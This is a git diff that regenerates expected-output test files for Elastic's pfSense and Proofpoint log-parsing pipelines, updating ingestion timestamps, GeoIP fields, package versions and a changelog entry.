@@ -498,7 +478,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068531500Z", + "ingested": "2021-12-14T14:54:16.421212180Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -593,7 +573,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068536800Z", + "ingested": "2021-12-14T14:54:16.421212581Z", "original": "\u003c134\u003e1 2021-07-03T19:10:14.578380-05:00 pfSense.example.com filterlog 72237 - - 118,,,1534283903,igb1.12,match,pass,in,4,0x0,,64,58337,0,DF,6,tcp,64,10.170.12.21,127.0.0.1,62132,53,0,S,3671644853,,32768,,mss;nop;wscale;sackOK;nop;nop;nop;nop;TS", "provider": "filterlog", "timezone": "-05:00", @@ -618,19 +598,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -701,7 +676,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068542100Z", + "ingested": "2021-12-14T14:54:16.421212948Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590254-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,51373,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56520,853,0,S,2661102197,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", 
@@ -726,19 +701,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -809,7 +779,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068547600Z", + "ingested": "2021-12-14T14:54:16.421213335Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590217-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18714,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -891,7 +861,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068553Z", + "ingested": "2021-12-14T14:54:16.421213708Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590279-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,3666,0,DF,17,udp,69,10.170.27.9,10.170.27.1,26641,53,49", "provider": "filterlog", "timezone": "-05:00", @@ -973,7 +943,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068558600Z", + "ingested": "2021-12-14T14:54:16.421214185Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590303-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,64,51896,0,DF,17,udp,69,10.170.27.9,192.168.1.1,26641,53,49", "provider": "filterlog", "timezone": "-05:00", 
@@ -998,19 +968,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1081,7 +1046,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068563900Z", + "ingested": "2021-12-14T14:54:16.421214558Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590325-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,543,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", @@ -1106,19 +1071,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1189,7 +1149,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068569700Z", + "ingested": "2021-12-14T14:54:16.421215174Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590347-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,46364,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49656,853,0,S,1642052952,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-05:00", 
@@ -1214,19 +1174,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -1288,7 +1243,7 @@ }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:42.068575200Z", + "ingested": "2021-12-14T14:54:16.421215555Z", "original": "\u003c134\u003e1 2021-07-03T19:10:15.590370-05:00 pfSense.example.com filterlog 72237 - - 183,,,1520797915,igb1.40,match,pass,in,4,0x0,,1,56778,0,DF,17,udp,200,10.170.40.57,175.16.199.1,58037,1900,180", "provider": "filterlog", "timezone": "-05:00", @@ -1366,7 +1321,7 @@ }, "event": { "reason": "ip-option", - "ingested": "2021-12-09T13:44:42.068580500Z", + "ingested": "2021-12-14T14:54:16.421215922Z", "original": "\u003c134\u003e1 2021-09-14T15:31:58.860079-05:00 pfSense.example.com filterlog 72913 - - 176,,,1520797901,igb1.50,ip-option,pass,in,4,0xc0,,1,20651,0,none,2,igmp,32,10.100.10.23,224.0.0.1,datalength=8 ", "provider": "filterlog", "timezone": "-05:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json index 55ea1dd7255..0e02e7bf9d6 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-unbound.log-expected.json 
@@ -43,7 +43,7 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-12-09T13:44:44.375894100Z", + "ingested": "2021-12-14T14:54:18.720979160Z", "original": "\u003c30\u003eAug 15 16:19:02 unbound[26931]: [26931:0] info: 192.168.1.1 api.opensubtitles.org. A IN", "provider": "unbound", "timezone": "-04:00", @@ -100,7 +100,7 @@ "ip": "172.16.33.2" }, "event": { - "ingested": "2021-12-09T13:44:44.375902400Z", + "ingested": "2021-12-14T14:54:18.720981903Z", "original": "\u003c30\u003eAug 15 16:18:59 unbound[26931]: [26931:2] info: 172.16.33.2 clients4.google.com. A IN", "provider": "unbound", "timezone": "-04:00", diff --git a/packages/pfsense/manifest.yml b/packages/pfsense/manifest.yml index 39950ac00bf..d4f4948c8d0 100644 --- a/packages/pfsense/manifest.yml +++ b/packages/pfsense/manifest.yml @@ -1,6 +1,6 @@ name: pfsense title: pfSense Logs -version: 0.2.1 +version: 0.2.2 release: experimental description: Collect and parse logs from pfSense devices with Elastic Agent. type: integration diff --git a/packages/proofpoint/changelog.yml b/packages/proofpoint/changelog.yml index 9f1e486955c..c5fca7c30c4 100644 --- a/packages/proofpoint/changelog.yml +++ b/packages/proofpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.5.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.5.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/proofpoint/data_stream/emailsecurity/_dev/test/pipeline/test-generated.log-expected.json b/packages/proofpoint/data_stream/emailsecurity/_dev/test/pipeline/test-generated.log-expected.json index 68deda386cb..e6cfb05d75a 100644 --- a/packages/proofpoint/data_stream/emailsecurity/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/proofpoint/data_stream/emailsecurity/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 29 06:09:59 avolupt low mod=perl cmd=clone cmd=olab id=nto duration=sse", "event": { - "ingested": "2021-06-09T13:10:40.441879200Z" + "ingested": "2021-12-14T14:54:22.370419656Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/02/12T13:12:33.umdo itessequ session_store[vol]: info luptat high s=nibus mod=mipsumq cmd=gnaali module=enatus rule=mquia folder=ameaqu pri=aqu duration=utper", "event": { - "ingested": "2021-06-09T13:10:40.441905500Z" + "ingested": "2021-12-14T14:54:22.370422164Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 emape low s=incidi mod=session_connect cmd=nse ip=10.46.185.46 country=temvel lip=iatu prot=serror hops_active=anti routes=ofdeF notroutes=metcons perlwait=roinBCS", "event": { - "ingested": "2021-06-09T13:10:40.441913600Z" + "ingested": "2021-12-14T14:54:22.370422671Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/03/12T03:17:42.iam mqua queued-eurort[3391]: olab: from=mquisnos, size=5771, class=ore, nrcpts=etconsec, msgid=err, proto=rdp, daemon=mUt, tls_verify=usmodte, auth=ele, relay=tenbyCic5882.api.home [10.69.20.77]", "event": { - "ingested": "2021-06-09T13:10:40.441945200Z" + "ingested": "2021-12-14T14:54:22.370423068Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 26 10:20:16 pteursi medium mod=service cmd=refresh cmd=turveli duration=toccae", "event": { - "ingested": "2021-06-09T13:10:40.441952400Z" + "ingested": "2021-12-14T14:54:22.370423469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 
"1.12.0" - }, "message": "April 9 17:22:51 ccusan low mod=zerohour type=Ciceroi cmd=refresh id=aveniam version=uradi", "event": { - "ingested": "2021-06-09T13:10:40.441958800Z" + "ingested": "2021-12-14T14:54:22.370423862Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 aboreetd high mod=smtpsrv cmd=listen cmd=dun addr=10.89.185.38", "event": { - "ingested": "2021-06-09T13:10:40.441965200Z" + "ingested": "2021-12-14T14:54:22.370424248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 8 07:27:59 ctetura medium mod=zerohour type=dolore cmd=init id=abor version=iqui", "event": { - "ingested": "2021-06-09T13:10:40.441971300Z" + "ingested": "2021-12-14T14:54:22.370424675Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 22 14:30:33 ritatis oloremi high s=icab mod=av_run cmd=mwr rule=fugi name=inculpaq cleaned=agna vendor=tionemu duration=eomnisis", "event": { - "ingested": "2021-06-09T13:10:40.441976900Z" + "ingested": "2021-12-14T14:54:22.370425056Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/06/05T21:33:08.incidi picia queued-reinject[mUtenima]: warn emaperi[7183]: sumquiad: from=dexeaco, size=6178, class=colabor, nrcpts=iusmodt, msgid=etdolo, proto=tcp, daemon=lorumw, relay=ommod3671.mail.domain", "event": { - "ingested": "2021-06-09T13:10:40.441982600Z" + "ingested": "2021-12-14T14:54:22.370425452Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 imadmi high s=tion mod=session_judge cmd=eataev module=liquide rule=uasia", "event": { - "ingested": "2021-06-09T13:10:40.441989100Z" + "ingested": 
"2021-12-14T14:54:22.370425870Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/07/04T11:38:16.uames tati access_run[utaliqu]: warn oriosamn medium s=santium m=iciatisu x=rehender mod=eporroqu cmd=uat rule=tem duration=est", "event": { - "ingested": "2021-06-09T13:10:40.441995200Z" + "ingested": "2021-12-14T14:54:22.370426410Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 samvolu err eid=ittenbyC module=isc age=aturve limit=emulla", "event": { - "ingested": "2021-06-09T13:10:40.442000600Z" + "ingested": "2021-12-14T14:54:22.370426806Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/08/02T01:43:25.itame eumfug zerohour_init[lit]: note asun low mod=quamnih type=oluptate cmd=onseq id=serunt version=aquaeabi", "event": { - "ingested": "2021-06-09T13:10:40.442005700Z" + "ingested": "2021-12-14T14:54:22.370427194Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 16 08:45:59 ento warn eid=pic status=\"evita file suntexp does not contain enough (or correct) info. 
Fix this or remove the file.\"", "event": { - "ingested": "2021-06-09T13:10:40.442011100Z" + "ingested": "2021-12-14T14:54:22.370427588Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 30 15:48:33 tmo very-high s=abi mod=spam_run cmd=sectetur rule=uioffi policy=oru score=temqu ndrscore=edol ipscore=colab suspectscore=ommodico phishscore=quatD bulkscore=mcolab spamscore=67.309000 adjustscore=tenima adultscore=tsedqu classifier=agnid adjust=proide reason=dolorem scancount=tlab engine=volupt definitions=osqui raw=xerc tests=iutali duration=fdeFi", "event": { - "ingested": "2021-06-09T13:10:40.442016400Z" + "ingested": "2021-12-14T14:54:22.370427977Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/09/13T22:51:07.sequine ectio dkimv_type[dutper]: err lamcolab: low mod=radi unexpected response type=gel", "event": { - "ingested": "2021-06-09T13:10:40.442021800Z" + "ingested": "2021-12-14T14:54:22.370428479Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 28 05:53:42 xeacomm very-high mod=av type=aturQui cmd=load id=utlabor", "event": { - "ingested": "2021-06-09T13:10:40.442035800Z" + "ingested": "2021-12-14T14:54:22.370428876Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 12 12:56:16 madmi tur low s=uatD mod=mail_attachment cmd=ariatu id=edquiac file=nci mime=tev type=saute omime=ntocca oext=ostru corrupted=ntoccae protected=autf size=3471 virtual=temquiav", "event": { - "ingested": "2021-06-09T13:10:40.442041200Z" + "ingested": "2021-12-14T14:54:22.370429286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"2016/10/26T19:58:50.tor qui queued-aglife[4499]: eavolup: to=fugiatn, delay=docon, xdelay=etconsec, mailer=ios, pri=evolu, relay=ersp3536.www5.lan, dsn=sauteiru, stat=mod", "event": { - "ingested": "2021-06-09T13:10:40.442046500Z" + "ingested": "2021-12-14T14:54:22.370429686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016/11/10T03:01:24.iquipe itempor mail_env_rcpt[quin]: err upida high s=nve m=remag x=uredol mod=ccaecat cmd=tquiin r=7440 value=temqu verified=ovol routes=ptasn", "event": { - "ingested": "2021-06-09T13:10:40.442051700Z" + "ingested": "2021-12-14T14:54:22.370430082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 24 10:03:59 idolore low mod=spam type=eetdolo cmd=refresh id=cteturad engine=untut definitions=uamni", "event": { - "ingested": "2021-06-09T13:10:40.442057500Z" + "ingested": "2021-12-14T14:54:22.370430470Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 8 17:06:33 orumSe high mod=regulation type=isnost cmd=init id=queips action=cancel dict=itess file=iscinge", "event": { - "ingested": "2021-06-09T13:10:40.442062400Z" + "ingested": "2021-12-14T14:54:22.370430852Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-12-23T12:09:07.inci atatn queued-alert[temUt]: info avol[752]: STARTTLS=essequam, relay=[10.193.83.81], version=1.5020, verify=str, cipher=iat, bits=etur", "event": { - "ingested": "2021-06-09T13:10:40.442068100Z" + "ingested": "2021-12-14T14:54:22.370431353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/01/06T07:11:41.isnostr umqu smtpsrv_run[tinv]: warn adipisc medium 
mod=isnisi cmd=ritatise rule=uamei duration=siut", "event": { - "ingested": "2021-06-09T13:10:40.442074100Z" + "ingested": "2021-12-14T14:54:22.370431743Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/01/20T14:14:16.ttenby boris dkimv_run[stenatu]: err isiuta low s=ratv m=riat x=ianon mod=tsed cmd=nts status=\"siut, tconsect\"", "event": { - "ingested": "2021-06-09T13:10:40.442079700Z" + "ingested": "2021-12-14T14:54:22.370432127Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/02/03T21:16:50.ctetura aveni sendmail[elit]: note seosqui sequamni[3866]: STARTTLS=tdol, relay=sit6590.lan [10.123.143.188], version=ncididun, verify=umSe, cipher=xeacomm, bits=cinge", "event": { - "ingested": "2021-06-09T13:10:40.442085200Z" + "ingested": "2021-12-14T14:54:22.370432606Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 18 04:19:24 runtmol very-high mod=spam type=odi cmd=load id=ptass", "event": { - "ingested": "2021-06-09T13:10:40.442090600Z" + "ingested": "2021-12-14T14:54:22.370432992Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 4 11:21:59 aec medium mod=spam type=iduntu cmd=load id=ccaeca", "event": { - "ingested": "2021-06-09T13:10:40.442095700Z" + "ingested": "2021-12-14T14:54:22.370433387Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 18 18:24:33 leumiu tla very-high s=uaeratv mod=session_connect cmd=isa ip=10.38.65.236 country=dqu lip=pid prot=rExc hops_active=iusmo routes=tame notroutes=naaliq perlwait=nte", "event": { - "ingested": "2021-06-09T13:10:40.442100600Z" + "ingested": 
"2021-12-14T14:54:22.370433770Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/04/02T01:27:07.ullamcor itationu dmarc_run[proident]: rprt maliquam medium s=atione m=lores x=ritati mod=orisni cmd=ons rule=remagn duration=ecillu", "event": { - "ingested": "2021-06-09T13:10:40.442106Z" + "ingested": "2021-12-14T14:54:22.370434157Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 umetMalo high mod=av type=utp cmd=refresh id=aeconseq vendor=lor engine=Sedut definitions=yCiceroi signatures=quunt", "event": { - "ingested": "2021-06-09T13:10:40.442111600Z" + "ingested": "2021-12-14T14:54:22.370434551Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 30 15:32:16 aliq low mod=access type=teni cmd=refresh id=dquiac action=accept dict=tore file=elits", "event": { - "ingested": "2021-06-09T13:10:40.442116100Z" + "ingested": "2021-12-14T14:54:22.370434936Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/05/14T22:34:50.uamnihi risnis mail_release[uov]: info itlab low s=sBono m=loremqu x=tetur mod=amvo cmd=siuta status=failure err=ommodo", "event": { - "ingested": "2021-06-09T13:10:40.442122800Z" + "ingested": "2021-12-14T14:54:22.370435329Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 29 05:37:24 atv high mod=access type=quira cmd=refresh id=rehende action=block dict=obeataev file=tempor", "event": { - "ingested": "2021-06-09T13:10:40.442127500Z" + "ingested": "2021-12-14T14:54:22.370435835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, 
"message": "June 12 12:39:58 tlaboree note s=norumet m=dtempo x=tin module=fugitse action=deny size=3916", "event": { - "ingested": "2021-06-09T13:10:40.442132400Z" + "ingested": "2021-12-14T14:54:22.370436221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/06/26T19:42:33.aturQu aaliq session_store[mipsamvo]: warn eiusmod very-high s=reetdo m=oreveri x=ehende mod=eaqueip cmd=eum module=lamc rule=umetMal folder=asper pri=umq duration=naal", "event": { - "ingested": "2021-06-09T13:10:40.442136800Z" + "ingested": "2021-12-14T14:54:22.370436615Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/07/11T02:45:07.uto iuntNequ pdr_ttl[esseq]: warn aincidun low s=veniamq mod=occ ttl=oloreseo reply=\"\\\"iruredol rscore=veniamqu\\\"\"", "event": { - "ingested": "2021-06-09T13:10:40.442141100Z" + "ingested": "2021-12-14T14:54:22.370437037Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 25 09:47:41 minim ataevi low s=repreh mod=av_run cmd=plic rule=irured name=illumqui cleaned=saq vendor=amali duration=ate", "event": { - "ingested": "2021-06-09T13:10:40.442145200Z" + "ingested": "2021-12-14T14:54:22.370437430Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/08/08T16:50:15.autfugi tasun mail_continue-system-sendmail[duntutla]: err ntium low s=asuntexp mod=adminim cmd=orisni action=cancel err=lmole", "event": { - "ingested": "2021-06-09T13:10:40.442149400Z" + "ingested": "2021-12-14T14:54:22.370437812Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/08/22T23:52:50.dolorem tem spam_init[exeacomm]: info aspe very-high mod=mides 
type=ciun cmd=olupta id=tsuntinc engine=inrepreh definitions=quovo", "event": { - "ingested": "2021-06-09T13:10:40.442153800Z" + "ingested": "2021-12-14T14:54:22.370438196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 6 06:55:24 occaec acommodi medium s=quaeab mod=mail_env_rcpt cmd=fici r=5161 value=dipiscin verified=olup routes=aco", "event": { - "ingested": "2021-06-09T13:10:40.442158Z" + "ingested": "2021-12-14T14:54:22.370438607Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/09/20T13:57:58.mag tob smtpsrv_load[dolores]: rprt equamnih high mod=deF type=itempo cmd=orumw id=redol", "event": { - "ingested": "2021-06-09T13:10:40.442162600Z" + "ingested": "2021-12-14T14:54:22.370438988Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 radipis high s=tiumto mod=mail_env_from cmd=litan value=nder qid=stenatus tls=equep routes=ever notroutes=tali host=BCS3474.lan ip=10.1.204.187 sampling=quin", "event": { - "ingested": "2021-06-09T13:10:40.442167Z" + "ingested": "2021-12-14T14:54:22.370439382Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/10/19T04:03:07.nculpaq culpaqui regulation_init[tvolup]: note tdolore low mod=col type=obea cmd=emp id=agnaaliq action=cancel dict=uptatem file=oinv", "event": { - "ingested": "2021-06-09T13:10:40.442171300Z" + "ingested": "2021-12-14T14:54:22.370439787Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "queued-reinject[2957]: odt", "event": { - "ingested": "2021-06-09T13:10:40.442175600Z" + "ingested": "2021-12-14T14:54:22.370440184Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/11/16T18:08:15.caecat rautod rprt[olest]: info eataev very-high s=ritati m=edquia x=itesse mod=mullam cmd=mexerc secprofile_name=meaque rcpts=5808 duration=mip", "event": { - "ingested": "2021-06-09T13:10:40.442180200Z" + "ingested": "2021-12-14T14:54:22.370440572Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/12/01T01:10:49.deriti sintocc session_throttle[cididu]: rprt uteir high s=mwrit mod=ptat cmd=der rule=equuntur ip=10.219.133.187 rate=quameiu crate=diduntu limit=eiusmod", "event": { - "ingested": "2021-06-09T13:10:40.442184400Z" + "ingested": "2021-12-14T14:54:22.370440960Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 15 08:13:24 tassita very-high mod=smtpsrv cmd=run cmd=oremi rule=ugitsedq duration=turmag", "event": { - "ingested": "2021-06-09T13:10:40.442188500Z" + "ingested": "2021-12-14T14:54:22.370441344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017/12/29T15:15:58.consecte pteurs dkimv_run[catcupi]: info autf very-high s=tiaecon m=uaturve x=amquisno mod=uido cmd=tla signature=mquiad identity=CSe host=lors7553.api.local result=unknown result_detail=rroqui", "event": { - "ingested": "2021-06-09T13:10:40.442192600Z" + "ingested": "2021-12-14T14:54:22.370441733Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/01/12T22:18:32.itae dtempo cvtd[atnula]: warn ditautf low mod=iquidex cmd=olup", "event": { - "ingested": "2021-06-09T13:10:40.442197200Z" + "ingested": "2021-12-14T14:54:22.370442223Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
